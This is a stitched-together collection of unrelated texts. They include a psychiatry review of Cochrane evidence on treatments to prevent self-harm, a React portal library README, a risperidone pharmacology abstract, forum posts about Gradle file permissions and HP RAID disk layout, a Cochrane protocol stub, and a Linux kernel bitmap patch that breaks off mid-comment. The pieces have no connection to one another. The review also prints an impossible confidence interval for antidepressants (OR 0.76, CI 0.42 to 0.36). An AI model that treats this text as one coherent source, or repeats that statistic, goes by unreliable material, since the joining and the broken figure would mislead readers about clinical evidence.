Article Text other Versions PDF Interventions to prevent self-harm: what does the evidence say? 1. Kate E Saunders1,2, 2. Katharine A Smith1,2,3 1. 1Department of Psychiatry, University of Oxford, Warneford Hospital, Oxford, UK; 2. 2Oxford Health NHS Foundation Trust, Warneford Hospital, Oxford, UK; 3. 3NIHR Oxford Cognitive Health Clinical Research Facility, Warneford Hospital, Oxford, UK 1. Correspondence to Dr Kate E Saunders, Department of Psychiatry, University of Oxford, Warneford Hospital, Oxford OX3 7JX, UK; kate.saunders{at}psych.ox.ac.uk Statistics from Altmetric.com Introduction Self-harm (SH) refers to intentional self-poisoning or self-injury, irrespective of motive or the extent of suicidal intent.1 Thus, it includes acts intended to result in suicide (sometimes referred to as ‘attempted suicide’), those without suicidal intent (eg, to communicate distress or reduce unpleasant feelings) and those with a mixed (or unclear) motivation. It is a major public health concern and a common cause of assessment, treatment and admission to general hospitals.2 However, the majority of those who SH do not present to hospital, and community prevalence is estimated to be as high as 20% in those aged 15 years.3 SH presentations increase significantly from the age of 12 years and decline from the mid-20s onwards.4 Repetition of SH is common, with up to 25% of individuals who present to hospital following SH returning to the same hospital following further SH within a year. Repetition is also frequent (54.8%) in adolescents who do not present to clinical services.5 At least 80% of individuals presenting to hospital following SH are suffering from at least one mental disorder6 (including major depression, bipolar disorder, anxiety and substance misuse, often in combination with personality disorders). However, the aetiology is complex; SH is often associated with acute life events, often against a background of longer term social and personal difficulties (such as relationship problems, financial difficulties or social isolation). A history of SH is associated with a significantly increased risk of subsequent suicide.7 One to three per cent of those who present to hospital after SH will die by suicide in the following year.7 Of those who die by suicide, over 50% have a history of SH and 15% have presented to hospital with SH in the preceding year.8 SH is not only a problem in terms of healthcare. It is also associated with poorer educational outcomes as well as significant health and social care costs.9 ,10 Improving the treatment of SH has been a focus of a number of national and international guidelines,1 ,11 although the paucity of evidence for effective treatments has been highlighted.12 The aetiology of SH is complex, encompassing not only mental health problems, but also psychological and social influences. Treatment options to be appraised should include pharmacological and psychological treatments, and studies of the role of social and societal change. As SH is a problem that often emerges during the teenage years, it is important to encompass studies in children and adolescents as well as adults. Methods To identify relevant evidence for the treatment and clinical management (whether short or long term) of SH, we searched PubMed, PsycINFO, Google Scholar and the Cochrane Library for systematic reviews and meta-analyses of randomised controlled trials (RCTs) published between 1980 and May 2016. No language constraints were applied and the following key words were used: self-harm, suicide attempt, non-suicidal self-injury, treatment. In case of multiple publications on the same topic, only the most recent or most comprehensive article was considered. The reference lists of reports identified were used to find additional publications. Results Three Cochrane reviews were identified13–15 which focused on pharmacological treatments, psychological treatments and interventions for children and adolescents. These Cochrane reviews are related. They were completed by the same group of authors (encompassing experts in suicide research in the UK, Ireland, Australia and Belgium), and the three together update a single Cochrane review originally published in 1999. The update was divided into three reviews to allow space for the assessment of secondary outcomes where possible. Pharmacological treatments for SH Given the high prevalence of depressive illness and depressive symptoms in people who SH,6 antidepressants would seem to be possible candidates for prevention of recurrence. Mood stabilisers may also be a possibility, as there is evidence of a specific antisuicidal effect of lithium when used to treat people with affective disorders.16 Antipsychotic medication, particularly in low doses, might also be considered, especially in those who frequently repeat SH, and or those with a diagnosis of borderline personality disorder. The Cochrane review included seven RCTs with a total of 546 patients.14 Interestingly, the reviewers did not find any new trials when they searched for this update, compared with their original search for the 1999 Cochrane review.12 It is not clear why this might be, but the difficulties in conducting RCTs of in this group in general are particularly pronounced when considering drug treatment. All studies were assessed using the risk of bias tool17 and were reported as being of low or very low quality, and no data on adverse events were reported. Information on psychiatric diagnosis was reported only in some trials and additional comorbidity in only one trial. Thus, it was not possible to make any association between the effects of different types of pharmacological treatment on repetition of SH according to diagnostic group. • Meta-analysis revealed no significant treatment effects on repetition of SH for antidepressants (OR 0.76, 95% CI 0.42 to 0.36), lithium (0.99, 0.33 to 2.95), low-dose fluphenazine (1.51, 0.50 to 4.58) or natural products (1.33, 0.38 to 4.62). The antipsychotic flupenthixol was found to significantly reduce SH in a single trial (0.09, 0.02 to 0.50) but numbers were small (n=30). These findings are in contrast to the observational data, particularly for lithium. The Cochrane review's analysis (of 167 participants) found no beneficial effect for lithium on repetition of SH, or on the secondary outcomes of depression score, hopelessness, suicidal ideation or suicide. Although with such a relatively small number of participants, it is very unlikely that there was sufficient power to show an effect on a relatively rare event such as suicide, the other data are somewhat surprising, given the evidence supporting the role of lithium in the reduction of suicidal behaviour. A systematic review and meta-analysis of 48 RCTs of lithium in 6674 patients with mood disorders found that lithium was more effective than placebo at reducing suicides but had little discernible effect on SH.16 However, the results of a number of observational studies suggest that lithium may reduce SH18 ,19 when compared with other anticonvulsants. In the specific population of patients with bipolar disorder, a recent large (n=14 396) population-based electronic health records study20 showed that rates of SH and unintentional injury were lower in the group treated with lithium compared with other mood stabilisers (valproate, olanzapine, quetiapine). It has been argued that the findings may be confounded by the secondary benefits of being on lithium (such as repeated blood tests, more clinic attendances). However, in a large naturalistic longitudinal study of non-fatal SH in individuals with bipolar disorder which replicated the protective effects of lithium, no difference was observed in the number of physician contacts in patients on lithium compared with those on other medications. • Other potential treatments such as ketamine and buprenorphine were not included in the review. There is an emerging evidence to support a rapid antidepressant effect of ketamine, a glutamate N-methyl-d-aspartate receptor antagonist, in the treatment of unipolar and bipolar depression.21 ,22 In depressed patients in the emergency department, a rapid reduction in suicidal ideation was observed following an intravenous infusion of ketamine with the reduction being maintained for up to 10 days.23 Suicidal cognition was eradicated in patients with depression given three times weekly infusions. Recent evidence suggests that these effects are mediated by the reduction in non-suicide-related depressive symptoms.24 Open-label studies investigating suicidal ideation and anhedonia suggest that both are reduced after acute intravenous ketamine.25 Further studies are needed to assess whether this effect is related to the antidepressant effect or is independent of it. In a multisite randomised, double-blind, placebo-controlled trial, ultra low-dose sublingual buprenorphine was associated with a significant reduction in Beck Suicidal Ideation Scores at 2 and 4 weeks in severely suicidal patients without substance abuse.26 • Electroconvulsive therapy (ECT) is widely acknowledged as an effective treatment for severe depressive episodes and is cited as a treatment for suicidal behaviour by the American Psychiatric Association.26 In some observational studies, ECT appears to significantly reduce the frequency of suicide attempts in depressed patients.27 ,28 While none of these approaches are included in the Cochrane review as no RCTs are yet available, initial findings suggest that they may be a helpful approach in the treatment of SH. Psychological treatments This Cochrane review identified 55 RCTs for psychological interventions for SH.13 The most common treatment modality was cognitive behavioural therapy (CBT)-based psychological therapy (18 trials). The majority of these trials explored the effects of a 1:1 intervention delivered in fewer than 10 sessions. The remaining 37 trials evaluated a range of other psychological interventions including dialectical behavioural therapy (DBT), mentalisation-based therapy (MBT), group-based psychotherapy and remote contact interventions (postcards, emergency cards, telephone contact). A significant treatment effect for CBT-based therapy compared with treatment as usual was observed with respect to repetition of SH (OR 0.70, 95% CI 0.55 to 0.88) although no reduction in the frequency of SH was found. While just 6% fewer people repeated SH following CBT, improvements in mood, hopelessness and suicidal thoughts were also observed. Most studies were small in nature and there was considerable variability between trial outcomes. The effects of the other therapeutic approaches remain unclear as they were mostly evaluated in small single studies. The evaluation of psychological treatments within an RCT is more challenging than that of pharmacological treatments as patients and therapists are aware of the treatment modality that they are receiving such that true blinding cannot be achieved. There is also the issue of the comparison arm of the trial. In the review, all ‘active’ treatments were compared with ‘treatment as usual’. While this addresses to some extent the non-specific effects of any type of psychological treatment (face-to-face contact, feeling that another individual is listening, etc), treatment as usual varies between centres in each country and between countries. This means that combining the studies together in a meta-analysis, while increasing the power, is not strictly comparing like with like. In addition, the studies of psychological treatments did not routinely document the ‘fidelity’ to the treatments. In other words, we do not know for certain how many of the offered sessions (either active treatment or treatment as usual) the participant actually attended. In addition, we cannot be certain how closely therapists adhered to the manualised therapy. So, by drawing a parallel with pharmacological studies, we do not know the ‘dose’ of active or placebo treatment that the participants received. While the findings for brief CBT-like therapy are encouraging, the trials did not identify for whom this intervention would be most effective. This is important—while the data suggest the best evidence that we have is that CBT should be offered to those who SH, we do not know whether it should be offered to all or a subgroup. Given the finite resources in psychological services, identifying the ‘active’ elements of the CBT intervention is a key question. Only studies comparing the full CBT intervention with the same intervention but missing a defined key element could answer this question. Implementing this strategy into clinical care also presents other problems. Only a small percentage present to services following SH,29 so hospital-based interventions will inevitably miss a significant number of the target population. In addition, psychiatric services are focused on providing treatment resources to those with a diagnosed mental illness, and many patients with SH will not meet standardised criteria. The most persuasive argument for implementing such a service would be an economic one. SH carries a significant direct and indirect cost in healthcare (in addition to the costs to the individual and their family).10 Future studies of CBT would be enhanced by including assessments of healthcare costs as an integral part of the study. While CBT is the most widely available modality of psychological treatment in the UK following the launch of the IAPT (Improving Access to Psychological Therapies) scheme,30 those who SH or are expressing suicidal ideation are often deemed too high risk to be eligible and are referred to specialist services where waiting times are often much longer. The single trials of other psychotherapies that were associated with favourable outcomes, for example, DBT and MBT, were all conducted in patients diagnosed with borderline personality disorder. The use of a specified diagnostic group means that there is clearer and more consistent framework for psychological intervention and understanding of SH as well as a more homogeneous patient group. Treatments for children and young people In their third Cochrane review Hawton et al15 identified only 11 trials of interventions for SH in children and adolescents. This was a surprisingly low number of trials, given that under 18s are a key target age group for SH interventions and suicidality is a relevant clinical issue in child and adolescent psychiatry.31 ,32 Most interventions were limited to single trials and the quality of the evidence was mostly graded as low. No trials of pharmacological interventions were identified. Neither group-based therapy nor DBT (adapted for use in adolescents) was found to be associated with a reduction in the proportion of participants engaging in SH compared with treatment as usual (OR 0.72, 0.12 to 4.40 and 1.72, 0.56 to 5.24 for DBT and group therapy, respectively), although a reduction in the frequency of SH over time was observed following DBT. There were also significantly greater reductions in depression, hopelessness and suicidal ideation in this group. MBT was associated with fewer adolescents scoring above the cut-off for repetition of SH based on the Risk-Taking and Self-Harm Inventory 12 months postintervention, although this study was limited to individuals who had multiple episodes of SH or emerging personality problem. School-based interventions were not included in the review as they generally target individuals irrespective of whether they have self-harmed or not. In a recent multicentre cluster RCT, a Youth Aware of Mental Health Programme intervention significantly reduced the incidence of suicide attempts (OR 0.45, 0.24 to 0.85) and suicidal ideation at 12-month follow-up (0.50, 0.27 to 0.92) compared with the control group. The reported reduction was more than 50% compared with the control group. Similar reductions were not associated with a manualised gatekeeper programme or screening for high-risk individuals by professionals.33 However, there are concerns about large-scale implementation of interventions in schools. While it is logical to focus on schoolchildren at an early age before SH is likely to start, careful assessment of risk needs to be undertaken. It is possible that interventions may harm as well as benefit. For the child and adolescent population, the issue of ‘contagion’ is particularly important (Hawton 2012).34 Discussion All three Cochrane reviews summarise relatively small numbers of studies which are of poor or moderate quality. Meta-analysis, where it was feasible, revealed small changes in SH but the majority of approaches evaluated involved single studies. The Cochrane methodology exclusively explores RCT data, and in the area of SH, this significantly limits their interpretation because of the many methodological challenges (see box 1). Observational data may be just as informative and perhaps more generalisable to clinical practice. The best example if this is the overwhelming observational evidence supporting the antisuicidal effects of lithium for which no RCT data exist. Testing interventions for the prevention or reduction of SH are limited by a number of methodological considerations. The ethics of randomising individuals who report suicidal ideation often means that trials can never be truly representative. The question of who to target an intervention towards is also an area of debate. The majority of studies focus on hospital presenters or those known to mental health services, whereas the majority of SH (particularly in younger people) occurs in individuals where this is not the case.29 Other studies chose to focus on those who repeatedly harm themselves or limited recruitment to individuals who had taken overdoses. More effective interventions may be those that target individuals prior to the emergence of SH or promote mental well-being in the population as a whole. The majority of completed suicides occur in individuals who are not known to mental health services at the time of their death such that there is an imperative for population intervention as opposed to focusing on high-risk groups. Box 1 Methodological challenges in designing studies to assess the efficacy of interventions for self-harm Methodological challenges in assessing the efficacy of interventions for self-harm: Heterogeneity of a study population recruited on the basis of a behaviour; Which population to study; Definitions of self-harm; Study context; Timing of intervention; Time to follow-up; Ethics of randomising suicidal patients; Finding an appropriate control intervention (particularly in psychological treatment trials). SH describes a range of different behaviours and is associated with nearly all mental disorders.6 The reasons for SH vary widely as to the methods and lethality. While a number of models for the emergence of SH and suicidality have been proposed, all highlight the complex nature of the behaviour and none provide a clear single focus for intervention. In view of the heterogeneous nature of the SH as well as the absence of a mechanistically valid treatment target, it is not surprising that treatment effects are small at best. Data from the treatment of specific disorders, for example, mood disorders indicate that significant reductions in SH can be achieved by targeting the disorder rather than the SH per se.16 The settings in which individuals who SH are most commonly encountered are the emergency department, general practice or in education. All of the treatment trials included in the three Cochrane reviews were limited to trials conducted in inpatient or outpatient settings which further limits the generalisability of the findings. The three Cochrane reviews identified highlight the challenges of testing interventions for a SH that are generalisable to routine clinical practice. They summarise the available randomised controlled evidence available, and therefore provide useful suggestions for effective therapies and inform areas for further research. However, the reliance on RCT data, while methodologically robust, leads to a limited summary of the available evidence and overlooks a number of important interventions for the reduction of SH. Given the many ethical and methodological challenges inherent in RCTs for SH, observational data are an important complementary source of evidence which is generalisable to clinical and non-clinical settings. In conclusion, there is limited RCT evidence for interventions for SH, whereas observational studies in specific diagnostic group highlight a number of effective treatments, in particular lithium. Acknowledgments The authors acknowledge support from the NIHR Oxford Cognitive Health Clinical Research Facility. References Footnotes • Disclaimer The views expressed are those of the authors and not necessarily those of the NHS, the NIHR or the Department of Health. • Competing interests None declared. • Provenance and peer review Not commissioned; externally peer reviewed. Request permissions If you wish to reuse any or all of this article please use the link below which will take you to the Copyright Clearance Center’s RightsLink service. You will be able to get a quick price and instant permission to reuse the content in many different ways.
Popularity 4.9 Declining Activity 0.0 Stable 571 16 73 Programming language: JavaScript License: BSD 3-clause "New" or "Revised" License Tags: UI Utilites     Portal     React     Dialog     Modal     Gateway     Latest version: v2.8.0 react-gateway alternatives and similar libraries Based on the "Portal" category. Alternatively, view react-gateway alternatives based on common mentions on social networks and blogs. Do you think we are missing an alternative of react-gateway or a related project? Add another 'Portal' Library README React Gateway Render React DOM into a new context (aka "Portal") This can be used to implement various UI components such as modals. See react-modal2. It also works in universal (isomorphic) React applications without any additional setup and in React Native applications when used correctly. Installation $ npm install --save react-gateway Example import React from 'react'; import { Gateway, GatewayDest, GatewayProvider } from 'react-gateway'; export default class Application extends React.Component { render() { return ( <GatewayProvider> <div> <h1>React Gateway Universal Example</h1> <div className="container"> <Gateway into="one"> <div className="item">Item 1</div> </Gateway> <Gateway into="two"> <div className="item">Item 2</div> </Gateway> <div className="item">Item 3</div> </div> <GatewayDest name="one" component="section" className="hello"/> <GatewayDest name="two"/> </div> </GatewayProvider> ); } } Will render as: <div> <h1>React Gateway Universal Example</h1> <div className="container"> <noscript></noscript> <noscript></noscript> <div className="item">Item 3</div> </div> <section className="hello"> <div className="item">Item 1</div> </section> <div> <div className="item">Item 2</div> </div> </div> Usage To get started with React Gateway, first wrap your application in the <GatewayProvider>. import React from 'react'; + import { + GatewayProvider + } from 'react-gateway'; export default class Application extends React.Component { render() { return ( + <GatewayProvider> <div> {this.props.children} </div> + </GatewayProvider> ); } } Then insert a <GatewayDest> whereever you want it to render and give it a name. import React from 'react'; import { GatewayProvider, + GatewayDest } from 'react-gateway'; export default class Application extends React.Component { render() { return ( <GatewayProvider> <div> {this.props.children} + <GatewayDest name="global"/> </div> </GatewayProvider> ); } } Then in any of your components (that get rendered inside of the <GatewayProvider>) add a <Gateway>. import React from 'react'; + import {Gateway} from 'react-gateway'; export default class MyComponent extends React.Component { render() { return ( <div> + <Gateway into="global"> + Will render into the "global" gateway. + </Gateway> </div> ); } } If you want to customize the <GatewayDest> element, you can pass any props, including component (which will allows you to specify a tagName or custom component), and they will be passed to the created element. export default class Application extends React.Component { render() { return ( <GatewayProvider> <div> {this.props.children} - <GatewayDest name="global"/> + <GatewayDest name="global" component="section" className="global-gateway"/> </div> </GatewayProvider> ); } } How it works React Gateway works very differently than most React "portals" in order to work in server-side rendered React applications. It maintains an internal registry of "containers" and "children" which manages where things should be rendered. This registry is created by <GatewayProvider> and passed to <Gateway> and <GatewayDest> invisibly via React's contextTypes. Whenever a child or container is added or removed, React Gateway will update its internal registry and ensure things are properly rendered. React Native example React Gateway does not directly depend on react-dom, so it works fine with React Native under one condition: You must pass React Native component like View or similar to component prop of <GatewayDest>. Because if you don't, <GatewayDest> will try to render div element, which is not available. import React from 'react'; import { Text, View } from 'react-native'; import { Gateway, GatewayDest, GatewayProvider } from 'react-gateway'; export default class Application extends React.Component { render() { return ( <GatewayProvider> <View> <Text>React Gateway Native Example</Text> <View> <Gateway into="one"> <Text>Text rendered elsewhere</Text> </Gateway> </View> <GatewayDest name="one" component={View} /> </View> </GatewayProvider> ); } }
Blog About • Record: found • Abstract: found • Article: not found Risperidone and paliperidone inhibit p-glycoprotein activity in vitro. Neuropsychopharmacology Time Factors, Animals, Swine, pharmacology, Risperidone, pharmacokinetics, Rhodamine 123, Rats, Pyrimidines, drug effects, Protein Transport, metabolism, P-Glycoprotein, Isoxazoles, Inhibitory Concentration 50, Epithelial Cells, Drug Interactions, Doxorubicin, Dose-Response Relationship, Drug, methods, Chromatography, High Pressure Liquid, cytology, Cerebral Cortex, Cells, Cultured, Antipsychotic Agents, Animals, Newborn Read this article at ScienceOpenPublisherPubMed Bookmark There is no author summary for this article yet. Authors can add summaries to their articles on ScienceOpen to make them more accessible to a non-specialist audience. Abstract Risperidone (RSP) and its major active metabolite, 9-hydroxy-risperidone (paliperidone, PALI), are substrates of the drug transporter P-glycoprotein (P-gp). The goal of this study was to examine the in vitro effects of RSP and PALI on P-gp-mediated transport. The intracellular accumulation of rhodamine123 (Rh123) and doxorubicin (DOX) were examined in LLC-PK1/MDR1 cells to evaluate P-gp inhibition by RSP and PALI. Both compounds significantly increased the intracellular accumulation of Rh123 and DOX in a concentration-dependent manner. The IC(50) values of RSP for inhibiting P-gp-mediated transport of Rh123 and DOX were 63.26 and 15.78 microM, respectively, whereas the IC(50) values of PALI were >100 microM, indicating that PALI is a less potent P-gp inhibitor. Caco-2 and primary cultured rat brain microvessel endothelial cells (RBMECs) were utilized to investigate the possible influence of RSP on intestinal absorption and blood-brain barrier (BBB) transport of coadministered drugs that are P-gp substrates. RSP, 1-50 microM, significantly enhanced the intracellular accumulation of Rh123 in Caco-2 cells by inhibiting P-gp activity with an IC(50) value of 5.87 microM. Following exposure to 10 microM RSP, the apparent permeability coefficient of Rh123 across Caco-2 and RBMECs monolayers was increased to 2.02 and 2.63-fold in the apical to basolateral direction, but decreased to 0.37 and 0.21-fold in the basolateral to apical direction, respectively. These data suggest that RSP and PALI, to a lesser extent, have a potential to influence the pharmacokinetics and hence the pharmacodynamics of coadministered drugs via inhibition of P-gp-mediated transport. However, no human data exist that address this issue. In particular, RSP may interact with its own active metabolite PALI by promoting its brain concentration through inhibiting P-gp-mediated efflux of PALI across endothelial cells of the BBB. Related collections Author and article information Journal 10.1038/sj.npp.1301181 16936711 Comments Comment on this article
Does project.sync only support executing as owner? I’m using project.sync to synchronize a source directory structure with a target directory structure. This is on a Linux machine. The user I’m executing as has user ownership of the source files, and group ownership of the target files. From a permission perspective, this should work. The problem is… it doesn’t. Gradle wants to chmod 775 the target directory structure, which group ownership doesn’t support. As a matter of fact, on Linux… the only way (that I know of) to issue a chmod is to actually own the files. So by extension… Gradle has to own the target directory structure. In theory… this seems like not that big of a deal. However, in this environment, the Jenkins user checks out the files, and the Gradle builds are done as a different user, because the builds are interacting with a running application, and Jenkins doesn’t have permission to interact with the application, so we use sudo for those bits. I’ve tried using dirMode and fileMode but that has no effect. As a matter of fact… no matter what I set for those values, project.sync still does a chmod 775 as the first step. I won’t give the entire stack trace… just the important bits: Caused by: org.gradle.api.GradleException: Could not copy file Caused by: org.gradle.internal.nativeintegration.filesystem.FileException: Could not set file mode 775 Caused by: net.rubygrapefruit.platform.NativeException: Could not set UNIX mode Sorry… sample task configuration: task testSync { doLast { project.sync { from 'source' into 'target' } } }
ProLiant Servers (ML,DL,SL) cancel Showing results for  Search instead for  Did you mean:  Smart Arry E200i Disk Distribution Pedro Tomás Occasional Contributor Smart Arry E200i Disk Distribution Hi, I have a ML350G5 with 6 SAS Disks, i want to have 3 Logical Drives with raid 1. The Raid controler has 2 ports(I dont know if the ports are totaly independent, but they have separate cables), and I want to know your opinion about the best disk distribution i the bay. Logical Drive 1 - Phisical Disk 1 and 4 (to be connected to 2 diferent ports. or Logical Drive 1 - Phisical Disk 1 and 2 (to be connected to same port. Logical drive 2 and 3 would be the same philosophy (the best one) 1 REPLY Mauro Rusignuolo Trusted Contributor Re: Smart Arry E200i Disk Distribution there are no differencies. the throughput of each controller's port is 1200MBytes/sec. 4 hdd of 2,5" 10K will not fill-out the channel. never. Bye. TJK <> Leonardo da Vinci
Ultrasonography for clinically suspected upper extremity deep vein thrombosis To determine the sensitivity and specificity of ultrasound for the diagnosis of UEDVT, verified by venography, in patients with clinically suspected disease. None We will investigate how test accuracy varies with patient group, prevalence, and methodological criteria related to the verification of disease status. This is a protocol. Share/Save
[RFC] bitmap onto and fold operators for mempolicy extensionsurn:uuid:99c11630-211d-65bc-f8d6-e5c153920d772022-12-08T11:05:23ZPaul Jacksonpj@sgi.com[RFC] bitmap onto and fold operators for mempolicy extensions2008-02-16T12:33:31Zurn:uuid:0a16cbde-7527-b231-5d1f-37bdd83a31bd [Beware - never tested, never booted.] From: Paul Jackson <pj@sgi.com> The following adds two more bitmap operators, bitmap_onto() and bitmap_fold(), with the usual cpumask and nodemask wrappers. The bitmap_onto() operator computes one bitmap relative to another. If the n-th bit in the origin mask is set, then the m-th bit of the destination mask will be set, where m is the position of the n-th set bit in the relative mask. The bitmap_fold() operator folds a bitmap into a second that has bit m set iff the input bitmap has some bit n set, where m == n mod sz, for the specified sz value. There are two substantive changes between this patch and its predecessor bitmap_relative: 1) Renamed bitmap_relative() to be bitmap_onto(). 2) Added bitmap_fold(). The essential motivation for bitmap_onto() is to provide a mechanism for converting a cpuset-relative CPU or Node mask to an absolute mask. Cpuset relative masks are written as if the current task were in a cpuset whose CPUs or Nodes were just the consecutive ones numbered 0..N-1, for some N. The bitmap_onto() operator is provided in anticipation of adding support for the first such cpuset relative mask, by the mbind() and set_mempolicy() system calls, using a planned flag of MPOL_F_RELATIVE_NODES. These bitmap operators (and their nodemask wrappers, in particular) will be used in code that converts the user specified cpuset relative memory policy to a specific system node numbered policy, given the current mems_allowed of the tasks cpuset. Such cpuset relative mempolicies will address two deficiencies of the existing interface between cpusets and mempolicies: 1) A task cannot at present reliably establish a cpuset relative mempolicy because there is an essential race condition, in that the tasks cpuset may be changed in between the time the task can query its cpuset placement, and the time the task can issue the applicable mbind or set_memplicy system call. 2) A task cannot at present establish what cpuset relative mempolicy it would like to have, if it is in a smaller cpuset than it might have mempolicy preferences for, because the existing interface only allows specifying mempolicies for nodes currently allowed by the cpuset. Cpuset relative mempolicies are useful for tasks that don't distinguish particularly between one CPU or Node and another, but only between how many of each are allowed, and the proper placement of threads and memory pages on the various CPUs and Nodes available. The motivation for the added bitmap_fold() can be seen in the following example. Let's say an application has specified some mempolicies that presume 16 memory nodes, including say a mempolicy that specified MPOL_F_RELATIVE_NODES (cpuset relative) nodes 12-15. Then lets say that application is crammed into a cpuset that only has 8 memory nodes, 0-7. If one just uses bitmap_onto(), this mempolicy, mapped to that cpuset, would ignore the requested relative nodes above 7, leaving it empty of nodes. That's not good; better to fold the higher nodes down, so that some nodes are included in the resulting mapped mempolicy. In this case, the mempolicy nodes 12-15 are taken modulo 8 (the weight of the mems_allowed of the confining cpuset), resulting in a mempolicy specifying nodes 4-7. Signed-off-by: Paul Jackson <pj@sgi.com> Cc: David Rientjes <rientjes@google.com> Cc: Lee.Schermerhorn@hp.com Cc: clameter@sgi.com Cc: ak@suse.de Cc: mel@csn.ul.ie Cc: kosaki.motohiro@jp.fujitsu.com Cc: ray-lk@madrabbit.org --- include/linux/bitmap.h | 6 + include/linux/cpumask.h | 22 ++++++ include/linux/nodemask.h | 22 ++++++ lib/bitmap.c | 158 +++++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 206 insertions(+), 2 deletions(-) --- 2.6.24-mm1.orig/include/linux/nodemask.h 2008-02-15 15:15:48.210590885 -0800 +++ 2.6.24-mm1/include/linux/nodemask.h 2008-02-15 17:56:45.454238787 -0800 @@ -14,6 +14,8 @@ * bitmap_scnlistprintf() and bitmap_parselist(), also in bitmap.c. * For details of node_remap(), see bitmap_bitremap in lib/bitmap.c. * For details of nodes_remap(), see bitmap_remap in lib/bitmap.c. + * For details of nodes_onto(), see bitmap_onto in lib/bitmap.c. + * For details of nodes_fold(), see bitmap_fold in lib/bitmap.c. * * The available nodemask operations are: * @@ -55,7 +57,9 @@ * int nodelist_scnprintf(buf, len, mask) Format nodemask as list for printing * int nodelist_parse(buf, map) Parse ascii string as nodelist * int node_remap(oldbit, old, new) newbit = map(old, new)(oldbit) - * int nodes_remap(dst, src, old, new) *dst = map(old, new)(dst) + * void nodes_remap(dst, src, old, new) *dst = map(old, new)(src) + * void nodes_onto(dst, orig, relmap) *dst = orig relative to relmap + * void nodes_fold(dst, orig, sz) dst bits = orig bits mod sz * * for_each_node_mask(node, mask) for-loop node over mask * @@ -326,6 +330,22 @@ static inline void __nodes_remap(nodemas bitmap_remap(dstp->bits, srcp->bits, oldp->bits, newp->bits, nbits); } +#define nodes_onto(dst, orig, relmap) \ + __nodes_onto(&(dst), &(orig), &(relmap), MAX_NUMNODES) +static inline void __nodes_onto(nodemask_t *dstp, const nodemask_t *origp, + const nodemask_t *relmapp, int nbits) +{ + bitmap_onto(dstp->bits, origp->bits, relmapp->bits, nbits); +} + +#define nodes_fold(dst, orig, sz) \ + __nodes_fold(&(dst), &(orig), sz, MAX_NUMNODES) +static inline void __nodes_fold(nodemask_t *dstp, const nodemask_t *origp, + int sz, int nbits) +{ + bitmap_fold(dstp->bits, origp->bits, sz, nbits); +} + #if MAX_NUMNODES > 1 #define for_each_node_mask(node, mask) \ for ((node) = first_node(mask); \ --- 2.6.24-mm1.orig/include/linux/bitmap.h 2008-02-15 15:15:48.210590885 -0800 +++ 2.6.24-mm1/include/linux/bitmap.h 2008-02-15 16:55:20.139255707 -0800 @@ -46,6 +46,8 @@ * bitmap_shift_left(dst, src, n, nbits) *dst = *src << n * bitmap_remap(dst, src, old, new, nbits) *dst = map(old, new)(src) * bitmap_bitremap(oldbit, old, new, nbits) newbit = map(old, new)(oldbit) + * bitmap_onto(dst, orig, relmap, nbits) *dst = orig relative to relmap + * bitmap_fold(dst, orig, sz, nbits) dst bits = orig bits mod sz * bitmap_scnprintf(buf, len, src, nbits) Print bitmap src to buf * bitmap_parse(buf, buflen, dst, nbits) Parse bitmap dst from kernel buf * bitmap_parse_user(ubuf, ulen, dst, nbits) Parse bitmap dst from user buf @@ -120,6 +122,10 @@ extern void bitmap_remap(unsigned long * const unsigned long *old, const unsigned long *new, int bits); extern int bitmap_bitremap(int oldbit, const unsigned long *old, const unsigned long *new, int bits); +extern void bitmap_onto(unsigned long *dst, const unsigned long *orig, + const unsigned long *relmap, int bits); +extern void bitmap_fold(unsigned long *dst, const unsigned long *orig, + int sz, int bits); extern int bitmap_find_free_region(unsigned long *bitmap, int bits, int order); extern void bitmap_release_region(unsigned long *bitmap, int pos, int order); extern int bitmap_allocate_region(unsigned long *bitmap, int pos, int order); --- 2.6.24-mm1.orig/include/linux/cpumask.h 2008-02-15 15:15:48.210590885 -0800 +++ 2.6.24-mm1/include/linux/cpumask.h 2008-02-15 17:57:08.202604547 -0800 @@ -14,6 +14,8 @@ * bitmap_scnlistprintf() and bitmap_parselist(), also in bitmap.c. * For details of cpu_remap(), see bitmap_bitremap in lib/bitmap.c * For details of cpus_remap(), see bitmap_remap in lib/bitmap.c. + * For details of cpus_onto(), see bitmap_onto in lib/bitmap.c. + * For details of cpus_fold(), see bitmap_fold in lib/bitmap.c. * * The available cpumask operations are: * @@ -53,7 +55,9 @@ * int cpulist_scnprintf(buf, len, mask) Format cpumask as list for printing * int cpulist_parse(buf, map) Parse ascii string as cpulist * int cpu_remap(oldbit, old, new) newbit = map(old, new)(oldbit) - * int cpus_remap(dst, src, old, new) *dst = map(old, new)(src) + * void cpus_remap(dst, src, old, new) *dst = map(old, new)(src) + * void cpus_onto(dst, orig, relmap) *dst = orig relative to relmap + * void cpus_fold(dst, orig, sz) dst bits = orig bits mod sz * * for_each_cpu_mask(cpu, mask) for-loop cpu over mask * @@ -311,6 +315,22 @@ static inline void __cpus_remap(cpumask_ bitmap_remap(dstp->bits, srcp->bits, oldp->bits, newp->bits, nbits); } +#define cpus_onto(dst, orig, relmap) \ + __cpus_onto(&(dst), &(orig), &(relmap), NR_CPUS) +static inline void __cpus_onto(cpumask_t *dstp, const cpumask_t *origp, + const cpumask_t *relmapp, int nbits) +{ + bitmap_onto(dstp->bits, origp->bits, relmapp->bits, nbits); +} + +#define cpus_fold(dst, orig, sz) \ + __cpus_fold(&(dst), &(orig), sz, NR_CPUS) +static inline void __cpus_fold(cpumask_t *dstp, const cpumask_t *origp, + int sz, int nbits) +{ + bitmap_fold(dstp->bits, origp->bits, sz, nbits); +} + #if NR_CPUS > 1 #define for_each_cpu_mask(cpu, mask) \ for ((cpu) = first_cpu(mask); \ --- 2.6.24-mm1.orig/lib/bitmap.c 2008-02-15 15:15:48.234591265 -0800 +++ 2.6.24-mm1/lib/bitmap.c 2008-02-16 03:12:58.842876198 -0800 @@ -698,6 +698,164 @@ int bitmap_bitremap(int oldbit, const un } EXPORT_SYMBOL(bitmap_bitremap); +/** + * bitmap_onto - translate one bitmap relative to another + * @dst: resulting translated bitmap + * @orig: original untranslated bitmap + * @relmap: bitmap relative to which translated + * @bits: number of bits in each of these bitmaps + * + * Set the n-th bit of @dst iff there exists some m such that the + * n-th bit of @relmap is set, the m-th bit of @orig is set, and + * the n-th bit of @relmap is also the m-th _set_ bit of @relmap. + * (If you understood the previous sentence the first time your + * read it, you're overqualified for your current job.) + * + * In other words, @orig is mapped onto (surjectively) @dst, + * using the the map { <n, m> | the n-th bit of @relmap is the + * m-th set bit of @relmap }. + * + * Any set bits in @orig above bit number W, where W is the + * weight of (number of set 